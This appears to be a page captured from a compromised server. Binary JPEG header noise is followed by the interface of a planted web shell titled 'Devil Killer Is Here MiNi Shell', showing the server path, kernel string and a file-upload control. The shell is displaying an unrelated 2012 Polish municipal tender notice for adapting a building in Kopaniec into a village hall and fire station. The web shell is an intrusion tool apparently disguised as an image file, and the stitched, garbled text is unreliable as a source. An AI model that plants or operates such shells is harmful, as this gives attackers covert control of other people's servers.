JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121025/416934-N-2012.html

<p class="kh_header"><b>Stara Kamienica: Adaptacja budynku nr 59 w Kopańcu z przeznaczeniem na świetlicę wiejską z pomieszczeniami dla Ochotniczej Straży Pożarnej w Kopańcu</b><br>
<b>Numer ogłoszenia: 416934 - 2012; data zamieszczenia: 25.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kamienica , Stara Kamienica 41, 58-512 Stara Kamienica, woj. dolnośląskie, tel. 75 75 14 337, faks 75 75 14 337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.new.bazagnim.pl/bip_stara_kamienica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Adaptacja budynku nr 59 w Kopańcu z przeznaczeniem na świetlicę wiejską z pomieszczeniami dla Ochotniczej Straży Pożarnej w Kopańcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot inwestycji stanowi adaptacja budynku nr 59 w Kopańcu z przeznaczeniem na świetlicę wiejską z pomieszczeniami dla Ochotniczej Straży Pożarnej
1.1 WSKAŹNIKI OBIEKTU:
POWIERZCHNIA DZIAŁKI		1 500,00 m2
POWIERZCHNIA  ZABUDOWY		
- istniejący budynek		ok. 172,00 m2
- projektowane rozbudowy		52,73 m2
POWIERZCHNIA UTWARDZONA		
- droga dojazdowa		ok. 228 m2
- miejsca postojowe		ok. 104 m2
- miejsca gromadzenia odpadów		20,0 m2
POWIERZCHNIA UŻYTKOWA		329,60 m2
KUBATURA OBIEKTU		1750,50 m 3
WYMIARY RZUTU		ok. 15,20 x 17,80 m
WYSOKOŚĆ BUDYNKU		9,38 m
ILOŚĆ KONDYGNACVJI		2
1.2 OPIS STANU ISTNIEJĄCEGO 
Istniejący obiekt to budynek II kondygnacyjny, pierwotnie przykryty dachem stromym, dwuspadowym o układzie równoległym do drogi powiatowej. Przyziemie budynku wykonane jest w technologii murowanej z cegły pełnej. Stropy drewniane wsparte na ścianach. Posadzka parteru wykonana na gruncie o różnych poziomach. Budynek został uszkodzony w wyniku pożaru. Od strony elewacji północno - zachodniej zlokalizowane są zabudowania gospodarcze w złym stanie technicznym - przeznaczone do wyburzenia.

1.3 PROGRAM UŻYTKOWY 
Zaprojektowano dwa zespoły pomieszczeń zgrupowanych wokół funkcji świetlicy wiejskiej oraz ochotniczej straży pożarnej. Na parterze zlokalizowano pomieszczenia garażowe dla potrzeb OSP wraz z szatniami i pomieszczeniami higieniczno - sanitarnymi. Na parterze zlokalizowano również magazyn na sprzęt podręczny, kotłownię oraz pomieszczenie porządkowe z wydzielonym WC. Na poddaszu budynku zlokalizowano świetlicę wiejska na ok. 100 osób. Na poddaszu zlokalizowano również pomieszczenia WC damskie i męskie oraz pomieszczenia kuchni i zmywalni naczyń.

1.4 DOSTOSOWANIE OBIEKTU DLA OSÓB NIEPEŁNOSPRAWNYCH
Projektowany budynek winien być dostępny dla osób niepełnosprawnych. Wszelkie wejścia do budynku dostępne bezpośrednio z przyległego terenu o szerokości przejścia min. 90 cm. Po zrealizowaniu inwestycji w kolejnym etapie Zamawiający przewidział montaż urządzenia typu schodołaz. Na poddaszu zaprojektowano łazienkę dostosowaną do korzystania przez osoby niepełnosprawne wyposażoną w miskę ustępowa i umywalkę o odpowiednich parametrach oraz obustronne uchwyty dla osób niepełnosprawnych.

1.5 ZESTAWIENIE POWIERZCHNI

0_1	hol wejściowy	10,56 pow. podłogi	- 10,56 pow. użytkowa
0_2	hol klatki schodowej 4,5 pow. podłogi - 4,5 pow. użytkowa
0_3	pomieszczenie porządkowe 7,48 pow. podłogi - 7,48 pow. użytkowa
0_4	korytarz komunikacyjny	9,32 pow. podłogi - 9,32 pow. użytkowa
0_5	suszarnia węży strażackich	1,25 pow. podłogi - 1,25 pow. użytkowa
0_6	szatnia damska 4,97 pow. podłogi	- 4,97 pow. użytkowa
0_7	pom. Higieniczno - sanitarne 5,38 pow. podłogi - 5,38 pow. użytkowa
0_8	kotłownia	9,62 pow. podłogi - 	9,62 pow. użytkowa
0_9	magazyn sprzętu ppoż.	4,4 pow. podłogi - 4,4 pow. użytkowa
0_10 garaż na wóz strażacki	46,75 pow. podłogi	- 46,75 pow. użytkowa
0_11 garaż na wóz strażacki	46,02 pow. podłogi	- 46,02 pow. użytkowa
0_12 pomieszczenie na sprzęt 13,12 pow. podłogi	- 13,12 pow. użytkowa
0_13 pomieszczenie higieniczno sanitarne 5,64 pow. podłogi	- 5,64 pow. użytkowa
0_14 szatnia męska 8,46 pow. podłogi	- 8,46 pow. użytkowa
 1_1	hol klatki schodowej 5,5 pow. podłogi -	2,65 pow. użytkowa
 1_2	korytarz komunikacyjny	11,85 pow. podłogi	- 11,85 pow. użytkowa
 1_3	WC męski	6,96 pow. podłogi	- 6,96 pow. użytkowa
 1_4	WC damski (niepełnosprawni)	4,23	pow. podłogi - 4,23 pow. użytkowa
 1_5	kuchnia	14,55 pow. podłogi	- 9,15 pow. użytkowa
 1_6	zmywalnia 2,79 pow. podłogi	- 1,15 pow. użytkowa
 1_7	świetlica wiejska 141,5 pow. podłogi - 116,50 pow. użytkowa
SUMA:	364,85 pow. podłogi - 329,60

1.6 OPIS FORMY ARCHITEKTONICZNEJ
Budynek po wykonaniu projektowanej rozbudowy zachowa pierwotne proporcje dachu tj. kąt dachu, wysokość okapu do przyległego terenu. ze względu na wysokość parteru wynoszącą 4,0 m, kondygnacja pierwszego piętra została jedynie uwidoczniona poprzez zastosowanie imitacji muru pruskiego wraz z blendami - wnękami okiennymi w miejscu pierwotnie istniejących otworów okiennych. Projektowana dobudowa została zlokalizowana w układzie prostopadłym do istniejącej bryły budynku. Posiada ona taką samą wysokość i szerokość elewacji szczytowej oraz  przykryta dachem o takim samym kącie nachylenia jak istniejąca część budynku. Na połaciach dachowych zaprojektowano układ lukarn dachowych o konstrukcji i wykończeniu ścian drewnianym. Przy kalenicy dachu nad częścią istniejącą zaprojektowano wieżyczkę z dachem kopertowym.. w wykończeniu elewacji zastosowano elementy architektoniczne i materiały nawiązujące do w  tradycji budowlanych regionu, tj. dachówkę ceramiczną karpiówkę w kolorze czerwonym -  w nawianiu do istniejącej , elewację tynkowaną , imitację muru pruskiego, drewnianą konstrukcję zadaszenia, okna z podziałami szprosami konstrukcyjnymi, porzeźbione końcówki krokwi, podbitkę dachową drewnianą, komin wykończony cegłą klinkierową.; 

1.7 ROZWIĄZANIA KONSTRUKCYJNO - MATERIAŁOWE
Szczegółowe opisy poszczególnych elementów budowlanych i wykończeniowych zawarte są w Projekcie Budowlanym opracowany przez  Pracownię A3 - Adaptacja budynku nr 59 w Kopańcu  z przeznaczeniem na świetlicę wiejską z pomieszczeniami dla  Ochotniczej Straży Pożarnej w Kopańcu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.21.40-9, 45.11.12.00-0, 45.26.24.10-8, 45.40.00.00-1, 45.30.00.00-0, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości:
10 000 PLN (słownie: dziesięć tysięcy złotych)
2. Wadium może być wniesione w następujących formach:
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym,  że poręczenie kasy jest zawsze zobowiązaniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275, z późniejszymi zmianami).
3. W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń - dokumenty te powinny być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji lub poręczenia ( Zamawiającego tj. Gminy Stara Kamienica),  gwaranta (banku lub instytucji udzielających gwarancji lub poręczenia ) oraz wskazanie ich siedzib,
b) określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c) kwotę gwarancji lub poręczenia,
d) termin ważności gwarancji lub poręczenia,
e) zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia  kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie:
- że  wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 ustawy P.z.p.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 ustawy P.z.p., lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie,
lub
 - że wykonawca,  którego ofertę wybrano:
 - odmówił podpisania umowy na warunkach określonych w ofercie, lub
 - nie wniósł zabezpieczenia należytego wykonania umowy, lub
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
W przypadku, gdy gwarancje lub poręczenia nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.
4. Wadium w formie gwarancji  lub poręczeń  nie podlega  przeniesieniu na osoby trzecie.
5. Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty  w  PLN : Bank Gospodarki Żywnościowej  S.A. Oddział Operacyjny Jelenia Góra  numer 11 2030 0045 1110 0000 0100 0850,  z adnotacją w tytule wpłaty: Wadium  - świetlica Kopaniec
6. Wadium wnoszone w innej, niż  pieniądz dopuszczonej przez Zamawiającego formie  formach wykonawca wnosi do Zamawiającego  przy czym ,    w takim przypadku za termin doręczenia uważa się datę jego zdeponowania u  Kierownika Referatu Rozwoju Gminy -  budynek  Urzędu Gminy Stara Kamienica - parter  lub innej  wskazanej osoby, w godzinach od 07:00 do 14:30   od poniedziałku do piątku , z wyłączeniem dni ustawowo wolnych od pracy.
7. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie lub formach wykonawca może  dołączyć do oferty - pod warunkiem,  że umieszczone zostanie w osobnej  kopercie  opisanej ( nazwa wykonawcy, adnotacja: Wadium -świetlica Kopaniec), w sposób umożliwiający Zamawiającemu  zdeponowanie wadium u wskazanej osoby , przed upływem terminu  otwarcia  ofert - bez konieczności naruszenia  koperty , w której znajduje się oferta.
8. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest nie wystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.
9. Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 u.p.z.p.
10. Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  wykonawca w  odpowiedzi  na wezwanie , o którym  mowa w punkcie 27.  nie złożył wymaganych przez Zamawiającego dokumentów lub oświadczeń o których mowa w art.25 ust.1 u.p.z.p., lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
12. W przypadku, gdy dokumenty te nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przepisy prawa nie nakładają obowiązku posiadania szczególnych uprawnień do wykonywania określonej działalności;
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa w punkcie 1.1  będzie dokonana na podstawie przedłożonego oświadczenia według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest do posiadania wiedzy i doświadczenia  - popartych należytym wykonaniem w okresie ostatnich 5 lat przed upływem terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie-  robót budowlanych  polegających na budowie lub rozbudowie co najmniej dwóch (2) budynków  z drewnianą więźbą dachową i pokryciem dachówką, z węzłem sanitarnym oraz instalacją elektryczną  i  wodociągowo - kanalizacyjną 
Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych w wymaganym zakresie, sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW, z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Ocena spełnienia warunku udziału w postępowaniu, o którym mowa w punkcie 1.2  będzie dokonana na podstawie przedłożonych dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent zobowiązany jest do dysponowania odpowiednim potencjałem technicznym oraz osobami - zdolnymi  do wykonania zamówienia, tj.  wskazać do uczestnictwa w wykonaniu niniejszego zamówienia co najmniej : 
a) Kierownika Budowy   posiadającego:
- co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy,
- uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej  lub   odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów 
b) Kierownika robót  lub majstra robót posiadającego:
- co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy lub majstra robót ,
- uprawnienia  budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, gazowych, wodociągowych  i kanalizacyjnych  bez ograniczeń  lub odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej wydanych przepisów w zakresie sieci, instalacji i urządzeń cieplnych,  wentylacyjnych, wodociągowych i kanalizacyjnych (dopuszcza się posiadanie uprawnień w ww zakresie przez dwie osoby  pod warunkiem, że obie zostaną wskazane na kierowników robót i lub majstrów robót zakresu odpowiadającego ich uprawnieniom. 
c) Kierownika robót lub majstra robót,  posiadającego:
- co najmniej dwa (2)  lata doświadczenia zawodowego na stanowisku kierownika budowy lub majstra robót,
- uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  lub  odpowiadające im ważne  uprawnienia budowlane,  które zostały wydane na podstawie wcześniej  wydanych przepisów .
1.3.1. Przez wymagany  minimalny okres  doświadczenia zawodowego  należy rozumieć łączną ilość miesięcy przepracowanych  na stanowisku jak proponowane, przy realizacji robót o podobnym charakterze jak przedmiot zamówienia, liczonych od daty uzyskania uprawnień budowlanych do daty ukazania się Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .
Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy i lub majstra budowy  nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie . 
1.3.2. Jeżeli wskazana wyżej osoba jest  obywatelem państw członkowskich Unii Europejskiej i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane jest od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego.
1.3.3. Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:
a) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności wymienionych w punkcie 1.3. a) b) c), odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat posiadanych kwalifikacji zawodowych w tym  rodzaju i zakresu uprawnień budowlanych i  ich numeru oraz daty wydania,  wymaganego doświadczenia zawodowego w tym szczególnie wykazanie posiadania wymaganego w punktach  poprzedzających, a także przypisanie im zakresu wykonywanych czynności. Przy każdej, wymienionej z imienia i nazwiska osobie   należy podać podstawę dysponowania tą osobą przez wykonawcę. Wykaz należy sporządzić wg wzoru określonego w  Załączniku Nr 5 do IDW. Do wykazania doświadczenia zawodowego można również wykorzystać fakultatywny wzór Załącznika Nr 5.1
b) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego - Załącznik Nr 6 do IDW
Ocena spełnienia warunku udziału w postępowaniu, w którym mowa w punkcie 1.3 będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oferent powinien pozostawać w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zadania popartej posiadaniem:
a) środków finansowych lub zdolności kredytowej lub środków finansowych i zdolności kredytowej w wysokości co najmniej 500 000  PLN
Wykonawcy zobowiązani są przedłożyć informację z banku  lub spółdzielczej kasy oszczędnościowo - kredytowej,  w których Wykonawca posiada rachunek, potwierdzającej  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert.
Ocena spełnienia warunku, o którym mowa w punkcie 1.4 a)  będzie dokonana w oparciu o złożony dokument wg formuły: 
spełnia - nie spełnia.
b) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia w wysokości  co najmniej  500 000 PLN
uwaga: do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności  cywilnej  zostanie  wezwany  wykonawca,  którego  oferta  uznana  zostanie za najkorzystniejszą przed podpisaniem umowy.
Ocena spełnienia warunku, o którym mowa w punkcie 1.4 b)  będzie dokonana w oparciu o złożone oświadczenie ( Załącznik nr 2), wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

